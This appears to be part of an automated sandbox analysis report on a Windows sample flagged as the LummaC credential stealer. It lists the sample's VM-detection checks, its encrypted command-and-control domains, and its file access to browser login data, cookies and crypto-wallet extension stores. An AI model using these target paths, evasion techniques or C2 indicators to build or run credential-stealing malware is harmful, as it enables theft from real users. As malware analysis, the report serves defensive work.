              Source: C:\Users\user\Desktop\fghj.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: fghj.exeStatic file information: File size 3206904 > 1048576
              Source: fghj.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x2aec00
              Source: fghj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: fghj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: Morpheme.pdb source: fghj.exe
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A693D LoadLibraryW,GetProcAddress,0_2_003A693D
              Source: fghj.exeStatic PE information: real checksum: 0x3346ba should be: 0x31e852
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3B125 push eax; mov dword ptr [esp], F5F6F708h0_2_00B3B133
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B2469D push esp; iretd 0_2_00B2469E
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3DB45 push eax; mov dword ptr [esp], E1E0FF2Eh0_2_00B3DB47

              Hooking and other Techniques for Hiding and Protection

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon756.png
              Source: C:\Users\user\Desktop\fghj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\fghj.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\fghj.exe TID: 7536Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fghj.exe TID: 7548Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: fghj.exe, 00000000.00000002.1613869748.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: fghj.exe, 00000000.00000003.1512865936.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1613112719.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Users\user\Desktop\fghj.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A693D LoadLibraryW,GetProcAddress,0_2_003A693D
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0038B mov edx, dword ptr fs:[00000030h]0_2_00B0038B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0094B mov eax, dword ptr fs:[00000030h]0_2_00B0094B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B00CFB mov eax, dword ptr fs:[00000030h]0_2_00B00CFB
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B00F9A mov eax, dword ptr fs:[00000030h]0_2_00B00F9A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B00F9B mov eax, dword ptr fs:[00000030h]0_2_00B00F9B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A4523 GetProcessHeap,HeapFree,0_2_003A4523

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: fghj.exeString found in binary or memory: debonairnukk.xyz
              Source: fghj.exeString found in binary or memory: effecterectz.xyz
              Source: fghj.exeString found in binary or memory: diffuculttan.xyz
              Source: fghj.exeString found in binary or memory: immureprech.biz
              Source: fghj.exeString found in binary or memory: deafeninggeh.biz
              Source: fghj.exeString found in binary or memory: spellshagey.biz
              Source: C:\Users\user\Desktop\fghj.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A6DD4 GetSystemTime,0_2_003A6DD4
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A2826 GetVersionExA,0_2_003A2826
              Source: C:\Users\user\Desktop\fghj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: fghj.exe, 00000000.00000003.1612725977.0000000000D08000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1613869748.0000000000D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\fghj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: fghj.exe PID: 7372, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pdata%\\Exodus\\Td
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binanceq)h
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
